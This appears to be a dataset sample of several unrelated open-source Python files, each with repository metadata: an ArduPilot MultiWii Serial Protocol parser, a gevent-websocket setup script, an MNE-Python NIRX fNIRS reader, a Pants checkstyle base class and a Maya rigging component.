self.values = {}
def parse(self, msp, dataSize):
'''parse data'''
ofs = msp.p
for i in range(len(self.format)):
fmt = self.format[i]
fields = self.fields[i].split(',')
if fmt[0] == '{':
# we have a repeat count from an earlier variable
right = fmt.find('}')
vname = fmt[1:right]
count = self.values[vname]
fmt = "%u%s" % (count, fmt[right+1:])
if fmt[0].isdigit():
repeat = int(re.search(r'\d+', fmt).group())
else:
repeat = None
fmt = "<" + fmt
fmt_size = struct.calcsize(fmt)
if dataSize < fmt_size:
raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
if repeat is not None:
for i in range(len(fields)):
self.values[fields[i]] = []
for j in range(repeat):
self.values[fields[i]].append(values[j*len(fields)])
else:
for i in range(len(fields)):
self.values[fields[i]] = values[i]
dataSize -= fmt_size
ofs += fmt_size
msp.by_name[self.name] = self
#print("Got %s" % self.name)
class PyMSP:
""" Multiwii Serial Protocol """
OSD_RSSI_VALUE = 0
OSD_MAIN_BATT_VOLTAGE = 1
OSD_CROSSHAIRS = 2
OSD_ARTIFICIAL_HORIZON = 3
OSD_HORIZON_SIDEBARS = 4
OSD_ITEM_TIMER_1 = 5
OSD_ITEM_TIMER_2 = 6
OSD_FLYMODE = 7
OSD_CRAFT_NAME = 8
OSD_THROTTLE_POS = 9
OSD_VTX_CHANNEL = 10
OSD_CURRENT_DRAW = 11
OSD_MAH_DRAWN = 12
OSD_GPS_SPEED = 13
OSD_GPS_SATS = 14
OSD_ALTITUDE = 15
OSD_ROLL_PIDS = 16
OSD_PITCH_PIDS = 17
OSD_YAW_PIDS = 18
OSD_POWER = 19
OSD_PIDRATE_PROFILE = 20
OSD_WARNINGS = 21
OSD_AVG_CELL_VOLTAGE = 22
OSD_GPS_LON = 23
OSD_GPS_LAT = 24
OSD_DEBUG = 25
OSD_PITCH_ANGLE = 26
OSD_ROLL_ANGLE = 27
OSD_MAIN_BATT_USAGE = 28
OSD_DISARMED = 29
OSD_HOME_DIR = 30
OSD_HOME_DIST = 31
OSD_NUMERICAL_HEADING = 32
OSD_NUMERICAL_VARIO = 33
OSD_COMPASS_BAR = 34
OSD_ESC_TMP = 35
OSD_ESC_RPM = 36
OSD_REMAINING_TIME_ESTIMATE = 37
OSD_RTC_DATETIME = 38
OSD_ADJUSTMENT_RANGE = 39
OSD_CORE_TEMPERATURE = 40
OSD_ANTI_GRAVITY = 41
OSD_G_FORCE = 42
OSD_MOTOR_DIAG = 43
OSD_LOG_STATUS = 44
OSD_FLIP_ARROW = 45
OSD_LINK_QUALITY = 46
OSD_FLIGHT_DIST = 47
OSD_STICK_OVERLAY_LEFT = 48
OSD_STICK_OVERLAY_RIGHT = 49
OSD_DISPLAY_NAME = 50
OSD_ESC_RPM_FREQ = 51
OSD_RATE_PROFILE_NAME = 52
OSD_PID_PROFILE_NAME = 53
OSD_PROFILE_NAME = 54
OSD_RSSI_DBM_VALUE = 55
OSD_RC_CHANNELS = 56
OSD_CAMERA_FRAME = 57
MSP_NAME =10
MSP_OSD_CONFIG =84
MSP_IDENT =100
MSP_STATUS =101
MSP_RAW_IMU =102
MSP_SERVO =103
MSP_MOTOR =104
MSP_RC =105
MSP_RAW_GPS =106
MSP_COMP_GPS =107
MSP_ATTITUDE =108
MSP_ALTITUDE =109
MSP_ANALOG =110
MSP_RC_TUNING =111
MSP_PID =112
MSP_BOX =113
MSP_MISC =114
MSP_MOTOR_PINS =115
MSP_BOXNAMES =116
MSP_PIDNAMES =117
MSP_WP =118
MSP_BOXIDS =119
MSP_SERVO_CONF =120
MSP_NAV_STATUS =121
MSP_NAV_CONFIG =122
MSP_MOTOR_3D_CONFIG =124
MSP_RC_DEADBAND =125
MSP_SENSOR_ALIGNMENT =126
MSP_LED_STRIP_MODECOLOR =127
MSP_VOLTAGE_METERS =128
MSP_CURRENT_METERS =129
MSP_BATTERY_STATE =130
MSP_MOTOR_CONFIG =131
MSP_GPS_CONFIG =132
MSP_COMPASS_CONFIG =133
MSP_ESC_SENSOR_DATA =134
MSP_GPS_RESCUE =135
MSP_GPS_RESCUE_PIDS =136
MSP_VTXTABLE_BAND =137
MSP_VTXTABLE_POWERLEVEL =138
MSP_MOTOR_TELEMETRY =139
MSP_SET_RAW_RC =200
MSP_SET_RAW_GPS =201
MSP_SET_PID =202
MSP_SET_BOX =203
MSP_SET_RC_TUNING =204
MSP_ACC_CALIBRATION =205
MSP_MAG_CALIBRATION =206
MSP_SET_MISC =207
MSP_RESET_CONF =208
MSP_SET_WP =209
MSP_SELECT_SETTING =210
MSP_SET_HEAD =211
MSP_SET_SERVO_CONF =212
MSP_SET_MOTOR =214
MSP_SET_NAV_CONFIG =215
MSP_SET_MOTOR_3D_CONFIG =217
MSP_SET_RC_DEADBAND =218
MSP_SET_RESET_CURR_PID =219
MSP_SET_SENSOR_ALIGNMENT =220
MSP_SET_LED_STRIP_MODECOLOR=221
MSP_SET_MOTOR_CONFIG =222
MSP_SET_GPS_CONFIG =223
MSP_SET_COMPASS_CONFIG =224
MSP_SET_GPS_RESCUE =225
MSP_SET_GPS_RESCUE_PIDS =226
MSP_SET_VTXTABLE_BAND =227
MSP_SET_VTXTABLE_POWERLEVEL=228
MSP_BIND =241
MSP_RTC =247
MSP_EEPROM_WRITE =250
MSP_DEBUGMSG =253
MSP_DEBUG =254
IDLE = 0
HEADER_START = 1
HEADER_M = 2
HEADER_ARROW = 3
HEADER_SIZE = 4
HEADER_CMD = 5
HEADER_ERR = 6
PIDITEMS = 10
MESSAGES = {
MSP_RAW_GPS: MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
MSP_IDENT: MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
MSP_STATUS: MSPItem('STATUS', "HHHI", "cycleTime,i2cError,present,mode"),
MSP_RAW_IMU: MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
MSP_SERVO: MSPItem('SERVO', "8h", "servo"),
MSP_MOTOR: MSPItem('MOTOR', "8h", "motor"),
MSP_RC: MSPItem('RC', "8h", "rc"),
MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
MSP_RTC: MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
["BBBBHBBH",
"{osd_item_count}H",
"B", "{stats_item_count}H",
"B", "{timer_count}H",
"HBIBBB"],
["feature,video_system,units,rssi_alarm,cap_alarm,unused1,osd_item_count,alt_alarm",
"osd_items",
"stats_item_count", "stats_items",
"timer_count", "timer_items",
"legacy_warnings,warnings_count,enabled_warnings,profiles,selected_profile,osd_overlay"]),
MSP_PID: MSPItem("PID", "8PID", "P,I,D"),
MSP_MISC: MSPItem("MISC", "HHHHHII","intPowerTrigger,conf1,conf2,conf3,conf4,conf5,conf6"),
MSP_MOTOR_PINS: MSPItem("MOTOR_PINS", "8H","MP"),
MSP_ANALOG: MSPItem("ANALOG", "BHHHH", "dV,consumed_mah,rssi,current,volt"),
MSP_STATUS: MSPItem("STATUS", "HHHIBHHBBIB", "task_delta,i2c_err_count,sensor_status,mode_flags,nop_1,system_load,gyro_time,nop_2,nop_3,armed,extra"),
}
def __init__(self):
self.msp_name = {
'name':None
}
self.msp_osd_config = {}
self.inBuf = bytearray([0] * 255)
self.p = 0
self.c_state = self.IDLE
self.err_rcvd = False
self.checksum = 0
self.cmd = 0
self.offset=0
self.dataSize=0
self.servo = []
self.mot = []
self.RCChan = []
self.byteP = []
self.byteI = []
self.byteD = []
self.confINF = []
self.byteMP = []
self.confP = []
self.confI = []
self.confD = []
# parsed messages, indexed by name
self.by_name = {}
def get(self, fieldname):
'''get a field from a parsed message by Message.Field name'''
a = fieldname.split('.')
msgName = a[0]
fieldName = a[1]
if not msgName in self.by_name:
# default to zero for simplicty of display
return 0
msg = self.by_name[msgName]
if not fieldName in msg.values:
raise Exception("Unknown field %s" % fieldName)
return msg.values[fieldName]
def read32(self):
'''signed 32 bit number'''
value, = struct.unpack("<i", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read32u(self):
'''unsigned 32 bit number'''
value, = struct.unpack("<I", self.inBuf[self.p:self.p+4])
self.p += 4
return value
def read16(self):
'''signed 16 bit number'''
value, = struct.unpack("<h", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read16u(self):
'''unsigned 16 bit number'''
value, = struct.unpack("<H", self.inBuf[self.p:self.p+2])
self.p += 2
return value
def read8(self):
'''unsigned 8 bit number'''
value, = struct.unpack("<B", self.inBuf[self.p:self.p+1])
self.p += 1
return value
def requestMSP (self, msp, payload = [], payloadinbytes = False):
if msp < 0:
return 0
checksum = 0
bf = ['$', 'M', '<']
pl_size = 2 * ((len(payload)) & 0xFF)
bf.append(pl_size)
checksum ^= (pl_size&0xFF)
bf.append(msp&0xFF)
checksum ^= (msp&0xFF)
        if len(payload) > 0:
            if payloadinbytes == False:
                packed = struct.pack('<%dh' % (pl_size // 2), *payload)
            else:
                packed = struct.pack('<%dB' % (pl_size // 2), *payload)
            for c in packed:
                # struct.pack returns str in Python 2 and bytes in Python 3
                ci = c if isinstance(c, int) else ord(c)
                checksum ^= (ci & 0xFF)
            bf = bf + payload
bf.append(checksum)
return bf
def evaluateCommand(self, cmd, dataSize):
if cmd in self.MESSAGES:
# most messages are parsed from the MESSAGES list
self.MESSAGES[cmd].parse(self, dataSize)
elif cmd == self.MSP_NAME:
s = bytearray()
for i in range(0,dataSize,1):
b = self.read8()
if b == 0:
break
s.append(b)
self.msp_name['name'] = s.decode("utf-8")
elif cmd == self.MSP_ACC_CALIBRATION:
x = None
elif cmd == self.MSP_MAG_CALIBRATION:
x = None
elif cmd == self.MSP_BOX:
x = None
elif cmd == self.MSP_BOXNAMES:
x = None
elif cmd == self.MSP_PIDNAMES:
x = None
elif cmd == self.MSP_SERVO_CONF:
x = None
elif cmd == self.MSP_DEBUGMSG:
x = None
elif cmd == self.MSP_DEBUG:
x = None
else:
print("Unhandled command ", cmd, dataSize)
def parseMspData(self, buf):
for c in buf:
self.parseMspByte(c)
def parseMspByte(self, c):
if sys.version_info.major >= 3:
cc = chr(c)
ci = c
else:
cc = c
ci = ord(c)
if self.c_state == self.IDLE:
if cc == '$':
self.c_state = self.HEADER_START
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_START:
if cc == 'M':
self.c_state = self.HEADER_M
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_M:
if cc == '>':
self.c_state = self.HEADER_ARROW
elif cc == '!':
self.c_state = self.HEADER_ERR
else:
self.c_state = self.IDLE
elif self.c_state == self.HEADER_ARROW or self.c_state == self.HEADER_ERR:
self.err_rcvd = (self.c_state == self.HEADER_ERR)
#print (struct.unpack('<B',c)[0])
self.dataSize = ci
# reset index variables
self.p = 0
self.offset = 0
self.checksum = 0
self.checksum ^= ci
# the command is to follow
self.c_state = self.HEADER_SIZE
elif self.c_state == self.HEADER_SIZE:
#print (struct.unpack('<B',c)[0])
self.cmd = ci
self.checksum ^= ci
self.c_state = self.HEADER_CMD
elif self.c_state == self.HEADER_CMD and self.offset < self.dataSize:
#print (struct.unpack('<B',c)[0])
self.checksum ^= ci
self.inBuf[self.offset] = ci
self.offset += 1
elif self.c_state == self.HEADER_CMD and self.offset >= self.dataSize:
# compare calculated and transferred checksum
if ((self.checksum&0xFF) == ci):
if self.err_rcvd:
print("Vehicle didn't understand the request type")
else:
self.evaluateCommand(self.cmd, self.dataSize)
else:
print('"invalid checksum for command "+((int)(cmd&0xFF))+": "+(checksum&0xFF)+" expected, got "+(int)(c&0xFF))')
self.c_state = self.IDLE
def setPID(self):
self.sendRequestMSP(self.requestMSP(self.MSP_PID))
self.receiveData(self.MSP_PID)
time.sleep(0.04)
payload = []
for i in range(0, self.PIDITEMS, 1):
self.byteP[i] = int((round(self.confP[i] * 10)))
self.byteI[i] = int((round(self.confI[i] * 1000)))
self.byteD[i] = int((round(self.confD[i])))
# POS - 4 POSR - 5 NAVR - 6
self.byteP[4] = int((round(self.confP[4] * 100.0)))
self.byteI[4] = int((round(self.confI[4] * 100.0)))
self.byteP[5] = int((round(self.confP[5] * 10.0)))
self.byteI[5] = int((round(self.confI[5] * 100.0)))
self.byteD[5] = int((round(self.confD[5] * 10000.0))) / 10
self.byteP[6] = int((round(self.confP[6] * 10.0)))
self.byteI[6] = int((round(self.confI[6] * 100.0)))
self.byteD[6] = int((round(self.confD[6] * 10000.0))) / 10
for i in range(0, self.PIDITEMS, 1):
payload.append(self.byteP[i])
payload.append(self.byteI[i])
payload.append(self.byteD[i])
self.sendRequestMSP(self.requestMSP(self.MSP_SET_PID, payload, True), True)
def arm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,2000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def disarm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,1000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def receiveIMU(self, duration):
timer = 0
start = time.time()
while timer < duration:
self.sendRequestMSP(self.requestMSP(self.MSP_RAW_IMU))
self.receiveData(self.MSP_RAW_IMU)
if self.msp_raw_imu['accx'] > 32768: # 2^15 ...to check if negative number is received
self.msp_raw_imu['accx'] -= 65536 # 2^16 ...converting into 2's complement
if self.msp_raw_imu['accy'] > 32768:
self.msp_raw_imu['accy'] -= 65536
if self.msp_raw_imu['accz'] > 32768:
self.msp_raw_imu['accz'] -= 65536
if self.msp_raw_imu['gyrx'] > 32768:
self.msp_raw_imu['gyrx'] -= 65536
if self.msp_raw_imu['gyry'] > 32768:
self.msp_raw_imu['gyry'] -= 65536
if self.msp_raw_imu['gyrz'] > 32768:
self.msp_raw_imu['gyrz'] -= 65536
print("size: %d, accx: %f, accy: %f, accz: %f, gyrx: %f, gyry: %f, gyrz: %f " %(self.msp_raw_imu['size'], self.msp_raw_imu['accx'], self.msp_raw_imu['accy'], self.msp_raw_imu['accz'], self.msp_raw_imu['gyrx'], self.msp_raw_imu['gyry'], self.msp_raw_imu['gyrz']))
time.sleep(0.04)
timer = timer + (time.time() - start)
start = time.time()
def calibrateIMU(self):
self.sendRequestMSP(self.requestMSP(self.MSP_ACC_CALIBRATION))
time.sleep(0.01)
|
squilter/ardupilot
|
libraries/AP_MSP/Tools/pymsp.py
|
Python
|
gpl-3.0
| 18,847 | 0.014114 |
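A hedged usage sketch of the parser above: it hand-assembles an MSP_ATTITUDE response frame ('$M>' header, payload size, command id, little-endian payload, XOR checksum over size, id and payload bytes) and feeds it to parseMspData. The roll/pitch/yaw numbers are arbitrary test values, not real telemetry:
import struct
msp = PyMSP()
payload = struct.pack('<hhh', 123, -45, 2700)  # roll, pitch, yaw as signed 16-bit
size = len(payload)
cmd = PyMSP.MSP_ATTITUDE
checksum = size ^ cmd
for b in bytearray(payload):
    checksum ^= b
frame = (b'$M>' + bytes(bytearray([size, cmd])) + payload
         + bytes(bytearray([checksum & 0xFF])))
msp.parseMspData(frame)
print(msp.get('ATTITUDE.roll'), msp.get('ATTITUDE.pitch'), msp.get('ATTITUDE.yaw'))
# expected output: 123 -45 2700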
from setuptools import setup, find_packages
setup(
name="gevent-websocket",
version="0.3.6",
description="Websocket handler for the gevent pywsgi server, a Python network library",
long_description=open("README.rst").read(),
author="Jeffrey Gelens",
author_email="jeffrey@noppo.pro",
license="BSD",
url="https://bitbucket.org/Jeffrey/gevent-websocket",
download_url="https://bitbucket.org/Jeffrey/gevent-websocket",
install_requires=("gevent", "greenlet"),
packages=find_packages(exclude=["examples","tests"]),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
)
|
imankulov/gevent-websocket
|
setup.py
|
Python
|
bsd-3-clause
| 946 | 0.002114 |
default_app_config = 'forked_apps.catalogue.config.CatalogueConfig'
|
OWStimpson/oscar_webstore
|
oscar_webstore_root/forked_apps/catalogue/__init__.py
|
Python
|
bsd-3-clause
| 68 | 0 |
# Authors: Robert Luke <mail@robertluke.net>
#
# License: BSD (3-clause)
from configparser import ConfigParser, RawConfigParser
import glob as glob
import re as re
import os.path as op
import numpy as np
from ..base import BaseRaw
from ..constants import FIFF
from ..meas_info import create_info, _format_dig_points
from ...annotations import Annotations
from ...transforms import apply_trans, _get_trans
from ...utils import logger, verbose, fill_doc
from ...utils import warn
@fill_doc
def read_raw_nirx(fname, preload=False, verbose=None):
"""Reader for a NIRX fNIRS recording.
This function has only been tested with NIRScout devices.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
Returns
-------
raw : instance of RawNIRX
A Raw object containing NIRX data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawNIRX(fname, preload, verbose)
def _open(fname):
return open(fname, 'r', encoding='latin-1')
@fill_doc
class RawNIRX(BaseRaw):
"""Raw object from a NIRX fNIRS file.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
@verbose
def __init__(self, fname, preload=False, verbose=None):
from ...externals.pymatreader import read_mat
from ...coreg import get_mni_fiducials # avoid circular import prob
logger.info('Loading %s' % fname)
if fname.endswith('.hdr'):
fname = op.dirname(op.abspath(fname))
if not op.isdir(fname):
raise RuntimeError('The path you specified does not exist.')
# Check if required files exist and store names for later use
files = dict()
keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2',
'config.txt', 'probeInfo.mat')
for key in keys:
files[key] = glob.glob('%s/*%s' % (fname, key))
if len(files[key]) != 1:
raise RuntimeError('Expect one %s file, got %d' %
(key, len(files[key]),))
files[key] = files[key][0]
if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1:
warn("A single dat file was expected in the specified path, but "
"got %d. This may indicate that the file structure has been "
"modified since the measurement was saved." %
(len(glob.glob('%s/*%s' % (fname, 'dat')))))
# Read number of rows/samples of wavelength data
last_sample = -1
with _open(files['wl1']) as fid:
for line in fid:
last_sample += 1
# Read header file
# The header file isn't compliant with the configparser. So all the
# text between comments must be removed before passing to parser
with _open(files['hdr']) as f:
hdr_str = f.read()
hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL)
hdr = RawConfigParser()
hdr.read_string(hdr_str)
# Check that the file format version is supported
if not any(item == hdr['GeneralInfo']['NIRStar'] for item in
["\"15.0\"", "\"15.2\""]):
raise RuntimeError('MNE does not support this NIRStar version'
' (%s)' % (hdr['GeneralInfo']['NIRStar'],))
if "NIRScout" not in hdr['GeneralInfo']['Device']:
warn("Only import of data from NIRScout devices have been "
"thoroughly tested. You are using a %s device. " %
hdr['GeneralInfo']['Device'])
# Parse required header fields
# Extract frequencies of light used by machine
fnirs_wavelengths = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['Wavelengths'])]
# Extract source-detectors
sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+',
hdr['DataStructure']['S-D-Key'])], int)
detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+',
hdr['DataStructure']['S-D-Key'])], int)
# Determine if short channels are present and on which detectors
if 'shortbundles' in hdr['ImagingParameters']:
short_det = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['ShortDetIndex'])]
short_det = np.array(short_det, int)
else:
short_det = []
# Extract sampling rate
samplingrate = float(hdr['ImagingParameters']['SamplingRate'])
# Read participant information file
inf = ConfigParser(allow_no_value=True)
inf.read(files['inf'])
inf = inf._sections['Subject Demographics']
# Store subject information from inf file in mne format
# Note: NIRX also records "Study Type", "Experiment History",
# "Additional Notes", "Contact Information" and this information
# is currently discarded
subject_info = {}
names = inf['name'].split()
if len(names) > 0:
subject_info['first_name'] = \
inf['name'].split()[0].replace("\"", "")
if len(names) > 1:
subject_info['last_name'] = \
inf['name'].split()[-1].replace("\"", "")
if len(names) > 2:
subject_info['middle_name'] = \
inf['name'].split()[-2].replace("\"", "")
# subject_info['birthday'] = inf['age'] # TODO: not formatted properly
subject_info['sex'] = inf['gender'].replace("\"", "")
# Recode values
if subject_info['sex'] in {'M', 'Male', '1'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE
elif subject_info['sex'] in {'F', 'Female', '2'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE
# NIRStar does not record an id, or handedness by default
# Read information about probe/montage/optodes
# A word on terminology used here:
# Sources produce light
# Detectors measure light
# Sources and detectors are both called optodes
# Each source - detector pair produces a channel
# Channels are defined as the midpoint between source and detector
mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None)
requested_channels = mat_data['probeInfo']['probes']['index_c']
src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100.
det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100.
ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100.
# These are all in MNI coordinates, so let's transform them to
# the Neuromag head coordinate frame
mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head')
src_locs = apply_trans(mri_head_t, src_locs)
det_locs = apply_trans(mri_head_t, det_locs)
ch_locs = apply_trans(mri_head_t, ch_locs)
# Set up digitization
dig = get_mni_fiducials('fsaverage', verbose=False)
for fid in dig:
fid['r'] = apply_trans(mri_head_t, fid['r'])
fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD
for ii, ch_loc in enumerate(ch_locs, 1):
dig.append(dict(
kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay
r=ch_loc,
ident=ii,
coord_frame=FIFF.FIFFV_COORD_HEAD,
))
dig = _format_dig_points(dig)
del mri_head_t
# Determine requested channel indices
# The wl1 and wl2 files include all possible source - detector pairs.
# But most of these are not relevant. We want to extract only the
# subset requested in the probe file
req_ind = np.array([], int)
for req_idx in range(requested_channels.shape[0]):
sd_idx = np.where((sources == requested_channels[req_idx][0]) &
(detectors == requested_channels[req_idx][1]))
req_ind = np.concatenate((req_ind, sd_idx[0]))
req_ind = req_ind.astype(int)
# Generate meaningful channel names
def prepend(list, str):
str += '{0}'
list = [str.format(i) for i in list]
return(list)
snames = prepend(sources[req_ind], 'S')
dnames = prepend(detectors[req_ind], '_D')
sdnames = [m + str(n) for m, n in zip(snames, dnames)]
sd1 = [s + ' ' + str(fnirs_wavelengths[0]) for s in sdnames]
sd2 = [s + ' ' + str(fnirs_wavelengths[1]) for s in sdnames]
chnames = [val for pair in zip(sd1, sd2) for val in pair]
# Create mne structure
info = create_info(chnames,
samplingrate,
ch_types='fnirs_cw_amplitude')
info.update(subject_info=subject_info, dig=dig)
# Store channel, source, and detector locations
# The channel location is stored in the first 3 entries of loc.
# The source location is stored in the second 3 entries of loc.
# The detector location is stored in the third 3 entries of loc.
# NIRx NIRSite uses MNI coordinates.
# Also encode the light frequency in the structure.
for ch_idx2 in range(requested_channels.shape[0]):
# Find source and store location
src = int(requested_channels[ch_idx2, 0]) - 1
info['chs'][ch_idx2 * 2]['loc'][3:6] = src_locs[src, :]
info['chs'][ch_idx2 * 2 + 1]['loc'][3:6] = src_locs[src, :]
# Find detector and store location
det = int(requested_channels[ch_idx2, 1]) - 1
info['chs'][ch_idx2 * 2]['loc'][6:9] = det_locs[det, :]
info['chs'][ch_idx2 * 2 + 1]['loc'][6:9] = det_locs[det, :]
# Store channel location as midpoint between source and detector.
midpoint = (src_locs[src, :] + det_locs[det, :]) / 2
info['chs'][ch_idx2 * 2]['loc'][:3] = midpoint
info['chs'][ch_idx2 * 2 + 1]['loc'][:3] = midpoint
info['chs'][ch_idx2 * 2]['loc'][9] = fnirs_wavelengths[0]
info['chs'][ch_idx2 * 2 + 1]['loc'][9] = fnirs_wavelengths[1]
# Extract the start/stop numbers for samples in the CSV. In theory the
# sample bounds should just be 10 * the number of channels, but some
# files have mixed \n and \n\r endings (!) so we can't rely on it, and
# instead make a single pass over the entire file at the beginning so
# that we know how to seek and read later.
bounds = dict()
for key in ('wl1', 'wl2'):
offset = 0
bounds[key] = [offset]
with open(files[key], 'rb') as fid:
for line in fid:
offset += len(line)
bounds[key].append(offset)
assert offset == fid.tell()
# Extras required for reading data
raw_extras = {
'sd_index': req_ind,
'files': files,
'bounds': bounds,
}
super(RawNIRX, self).__init__(
info, preload, filenames=[fname], last_samps=[last_sample],
raw_extras=[raw_extras], verbose=verbose)
# Read triggers from event file
if op.isfile(files['hdr'][:-3] + 'evt'):
with _open(files['hdr'][:-3] + 'evt') as fid:
t = [re.findall(r'(\d+)', line) for line in fid]
onset = np.zeros(len(t), float)
duration = np.zeros(len(t), float)
description = [''] * len(t)
for t_idx in range(len(t)):
binary_value = ''.join(t[t_idx][1:])[::-1]
trigger_frame = float(t[t_idx][0])
onset[t_idx] = (trigger_frame) * (1.0 / samplingrate)
duration[t_idx] = 1.0 # No duration info stored in files
description[t_idx] = int(binary_value, 2) * 1.
annot = Annotations(onset, duration, description)
self.set_annotations(annot)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a segment of data from a file.
The NIRX machine records raw data as two different wavelengths.
The returned data interleaves the wavelengths.
"""
sdindex = self._raw_extras[fi]['sd_index']
wls = [
_read_csv_rows_cols(
self._raw_extras[fi]['files'][key],
start, stop, sdindex,
self._raw_extras[fi]['bounds'][key]).T
for key in ('wl1', 'wl2')
]
# TODO: Make this more efficient by only indexing above what we need.
# For now let's just construct the full data matrix and index.
# Interleave wavelength 1 and 2 to match channel names:
this_data = np.zeros((len(wls[0]) * 2, stop - start))
this_data[0::2, :] = wls[0]
this_data[1::2, :] = wls[1]
data[:] = this_data[idx]
return data
def _read_csv_rows_cols(fname, start, stop, cols, bounds):
with open(fname, 'rb') as fid:
fid.seek(bounds[start])
data = fid.read(bounds[stop] - bounds[start]).decode('latin-1')
x = np.fromstring(data, float, sep=' ')
x.shape = (stop - start, -1)
x = x[:, cols]
return x
|
Teekuningas/mne-python
|
mne/io/nirx/nirx.py
|
Python
|
bsd-3-clause
| 13,599 | 0 |
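A hedged usage sketch of the reader defined above; the folder path is a placeholder and must point at a real NIRx recording directory containing the .hdr/.wl1/.wl2/probeInfo.mat files the loader checks for:
import mne
raw = mne.io.read_raw_nirx('/path/to/nirx_recording', preload=True)
print(raw.info['ch_names'][:4])  # e.g. ['S1_D1 760', 'S1_D1 850', 'S1_D2 760', ...]
print(raw.annotations)           # triggers parsed from the .evt file, if present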
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.subsystem.subsystem import Subsystem
class PluginSubsystemBase(Subsystem):
@classmethod
def register_options(cls, register):
super(PluginSubsystemBase, cls).register_options(register)
# All checks have this option.
register('--skip', default=False, action='store_true',
help='If enabled, skip this style checker.')
def get_plugin(self, python_file):
return self.get_plugin_type()(self.get_options(), python_file)
def get_plugin_type(self):
    raise NotImplementedError('get_plugin_type() not implemented in class {}'.format(type(self)))
|
qma/pants
|
src/python/pants/backend/python/tasks/checkstyle/plugin_subsystem_base.py
|
Python
|
apache-2.0
| 886 | 0.006772 |
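For illustration, a hedged sketch of a concrete checker subsystem built on the base class above; the PrintStatementsChecker plugin and its options scope are hypothetical, not part of Pants:
from pants.backend.python.tasks.checkstyle.plugin_subsystem_base import PluginSubsystemBase
class PrintStatementsChecker(object):
    """Hypothetical checker plugin; get_plugin() constructs it as (options, python_file)."""
    def __init__(self, options, python_file):
        self._options = options
        self._python_file = python_file
class PrintStatementsSubsystem(PluginSubsystemBase):
    options_scope = 'pycheck-print-statements'  # assumed scope name, illustrative only
    def get_plugin_type(self):
        return PrintStatementsChecker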
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import maya.cmds as cmds
import constants as const
import rigBuildLib as complib
reload(complib)
class Component(object):
def __init__(self):
self.cmpdata = {}
self.compName = None
self.compSide = None
self.compColor = None
def defineComponent(self, name, side):
"""
Creates the base layout for the component as it would appear in scene
:param name: The name of the component
:param side: The side of the component
:return:
"""
self.compName = name
self.compSide = side
data = {}
data[name] = {}
data[name]['layers'] = ["input", "output", "control", "parts", "deform", 'definition']
data[name]['inputs'] = ["componentDomain"]
data[name]['parts'] = ["hidden"]
self.setCompColor()
return data
@property
def data(self):
return self.cmpdata
@property
def layer(self):
return self.cmpdata
@property
def name(self):
return self.compName
@property
def side(self):
return self.compSide
@property
def color(self):
return self.compColor
def setCompColor(self):
if self.side == "L":
self.compColor = 14
elif self.side == "R":
self.compColor = 13
else:
self.compColor = 25
def addCustomInput(self, name):
grpName = "{}_input".format(name)
inputGrp = complib.createGroup(grpName, self.name, self.side,)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['input'])
